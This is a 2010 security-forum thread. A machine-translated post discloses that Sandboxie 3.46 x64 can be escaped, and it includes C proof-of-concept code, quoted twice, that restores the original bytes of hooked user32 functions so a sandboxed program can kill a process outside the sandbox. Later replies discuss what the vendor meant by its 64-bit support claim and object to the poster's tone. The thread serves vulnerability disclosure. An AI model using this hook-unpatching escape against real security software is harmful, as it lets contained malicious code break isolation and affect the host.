breakout sandboxie 3.46 x64

View previous topic View next topic Go down

breakout sandboxie 3.46 x64

Post by mj0011 on 29/7/2010, 17:39

by google translate
==================================

Sandboxie 3.46 to see the official version released in the update statement, sandboxie shamelessly and boastfully claimed that he had the perfect support for the x64-bit operating system, 64-bit operating system and the user can get the same 32-bit operating system user security :

"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"

In the X64 on making a perfect defense to support the complete core commercial software, is a very difficult issue, I can not help but praise the beginning of the sandboxie of

After praise and began to test in the end is not able to really support the defense of the X64 After the test I discovered that is not the case, sandboxie simply can not provide and in 64 of 32 equal protection, the 64-bit on, SANDBOXIE a lot of defense is missing, or can easily be bypassed, but the same 32 defense will not be affected.

Give a simple example, in the 32-bit operating systems, the end of the process for EndTask form, sandboxie made a protected achieved by hook NtRequestWaitReplyPort csrss of RPC communication with the interceptor to intercept the terminating of the process, but in 64-bit operating system , the only approved ring3 api hook EndTask way to implement the UI such as isolation

It is clear that the procedure was isolated sandbox can easily break this useless protection, through the sandbox, the process of destruction outside the sandbox or the sandbox outside the process to steal the information.

Here attached a test program, the need win7 x64 Simplified Chinese operating system running (because of hard-coding the window name, etc.), this procedure is used in the X64 on to start run sandbox and they can penetrate the sandbox to terminate outside the sandbox the calculator program.
Test method, start the calculator first, and then run sandbox run endtask.exe, calculator instantly terminated

POC test program source code:

#include "stdafx.h"
#define WINNT 1
#include "windows.h"
#include "winuser.h"
int _tmain(int argc, _TCHAR* argv[])
{
PVOID pAddr = GetProcAddress(GetModuleHandleA("user32.dll") , "EndTask");
PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");

ULONG oldp ;

VirtualProtect(pAddr , 0x5 , PAGE_READWRITE , &oldp);

*(BYTE*)pAddr = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89 ;

VirtualProtect(pAddr , 0x5 , oldp, &oldp);

VirtualProtect(pAddr2 , 0x5 , PAGE_READWRITE , &oldp);

*(BYTE*)pAddr2 = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83 ;

VirtualProtect(pAddr2 , 0x5 , oldp, &oldp);



HWND h = FindWindowExA(0 , 0 , 0 ,"Calculator");
if (h == 0 )
{printf("cannot find calc\n");}


EndTask(h , TRUE , TRUE );
return 0;
}

mj0011
New Member
New Member

Posts : 2
Join date : 2010-07-13

View user profile

Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by ssj100 on 29/7/2010, 17:57

Wow, thanks for that mj0011 - I'll forward that to tzuk and see what he thinks. However, let me correct/clarify a few non-technical things about Sandboxie 64-bit.

Essentially (keeping in mind that I'm replying to a piece of automatically translated text), I think you have mis-interpreted this statement:
"Support for 64-bit Windows should now be on par with 32-bit Windows"
I was wondering about what this meant exactly too, and I got it clarified here:
http://www.sandboxie.com/phpbb/viewtopic.php?p=54417#54417

As you can see, tzuk's reply is fairly clear:
I was referring to the many, many problems reported about getting stuff to install or run properly under 64-bit Sandboxie, where the same stuff would work perfectly under 32-bit Sandboxie.
In no way does he claim that 64-bit Sandboxie is as strong against malware as 32-bit Sandboxie. Basically tzuk is referring to technical support when he states that 64-bit Sandboxie is on par with 32-bit - he is not referring to the strength of the program to perform containment/isolation.

In fact, tzuk has already admitted many times over that 64-bit Sandboxie is not as strong as 32-bit Sandboxie. It's even officially documented here:
http://www.sandboxie.com/index.php?NotesAbout64BitEdition

The 64-bit edition of Sandboxie provides a reduced level of protection compared to the 32-bit edition of Sandboxie.

_________________
Sandboxie + LUA + SRP + DEP + SuRun
Windows Firewall + NAT Router + IPSec (on-demand)
VirtualBox (on-demand)
Drive SnapShot (on-demand)
avatar
ssj100
Administrator
Administrator

Posts : 1389
Join date : 2010-04-14

View user profile http://ssj100.fullsubject.com

Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by ssj100 on 29/7/2010, 18:49

tzuk replies here:
http://www.sandboxie.com/phpbb/viewtopic.php?p=56358#56358

_________________
Sandboxie + LUA + SRP + DEP + SuRun
Windows Firewall + NAT Router + IPSec (on-demand)
VirtualBox (on-demand)
Drive SnapShot (on-demand)
avatar
ssj100
Administrator
Administrator

Posts : 1389
Join date : 2010-04-14

View user profile http://ssj100.fullsubject.com

Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by Guest on 30/7/2010, 01:29

Admin note
Please, in future address your comments and questions to the developer before throwing insults around here. This forum is not a "free for all" for people to insult or disparage active developers.

mj0011 wrote:by google translate
==================================

Sandboxie 3.46 to see the official version released in the update statement, sandboxie shamelessly and boastfully claimed that he had the perfect support for the x64-bit operating system, 64-bit operating system and the user can get the same 32-bit operating system user security :

"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"

In the X64 on making a perfect defense to support the complete core commercial software, is a very difficult issue, I can not help but praise the beginning of the sandboxie of

After praise and began to test in the end is not able to really support the defense of the X64 After the test I discovered that is not the case, sandboxie simply can not provide and in 64 of 32 equal protection, the 64-bit on, SANDBOXIE a lot of defense is missing, or can easily be bypassed, but the same 32 defense will not be affected.

Give a simple example, in the 32-bit operating systems, the end of the process for EndTask form, sandboxie made a protected achieved by hook NtRequestWaitReplyPort csrss of RPC communication with the interceptor to intercept the terminating of the process, but in 64-bit operating system , the only approved ring3 api hook EndTask way to implement the UI such as isolation

It is clear that the procedure was isolated sandbox can easily break this useless protection, through the sandbox, the process of destruction outside the sandbox or the sandbox outside the process to steal the information.

Here attached a test program, the need win7 x64 Simplified Chinese operating system running (because of hard-coding the window name, etc.), this procedure is used in the X64 on to start run sandbox and they can penetrate the sandbox to terminate outside the sandbox the calculator program.
Test method, start the calculator first, and then run sandbox run endtask.exe, calculator instantly terminated

POC test program source code:

#include "stdafx.h"
#define WINNT 1
#include "windows.h"
#include "winuser.h"
int _tmain(int argc, _TCHAR* argv[])
{
PVOID pAddr = GetProcAddress(GetModuleHandleA("user32.dll") , "EndTask");
PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");

ULONG oldp ;

VirtualProtect(pAddr , 0x5 , PAGE_READWRITE , &oldp);

*(BYTE*)pAddr = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89 ;

VirtualProtect(pAddr , 0x5 , oldp, &oldp);

VirtualProtect(pAddr2 , 0x5 , PAGE_READWRITE , &oldp);

*(BYTE*)pAddr2 = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83 ;

VirtualProtect(pAddr2 , 0x5 , oldp, &oldp);



HWND h = FindWindowExA(0 , 0 , 0 ,"Calculator");
if (h == 0 )
{printf("cannot find calc\n");}


EndTask(h , TRUE , TRUE );
return 0;
}

Guest
Guest


Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by ssj100 on 30/7/2010, 03:24

Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.

_________________
Sandboxie + LUA + SRP + DEP + SuRun
Windows Firewall + NAT Router + IPSec (on-demand)
VirtualBox (on-demand)
Drive SnapShot (on-demand)
avatar
ssj100
Administrator
Administrator

Posts : 1389
Join date : 2010-04-14

View user profile http://ssj100.fullsubject.com

Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by Guest on 30/7/2010, 04:34

Yes sometimes those translations are strange. Smile but it seemed unnecessarily aggressive.

ssj100 wrote:Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.

Guest
Guest


Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by blah1234 on 9/2/2011, 10:27

Didn't MS provide API's to security companies to access the kernel back in 2006? What ever happened to that?
http://www.fiercecio.com/story/microsoft-debuts-draft-patchguard-workarounds/2006-12-20

blah1234
New Member
New Member

Posts : 1
Join date : 2011-02-09

View user profile

Back to top Go down

Re: breakout sandboxie 3.46 x64

Post by Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum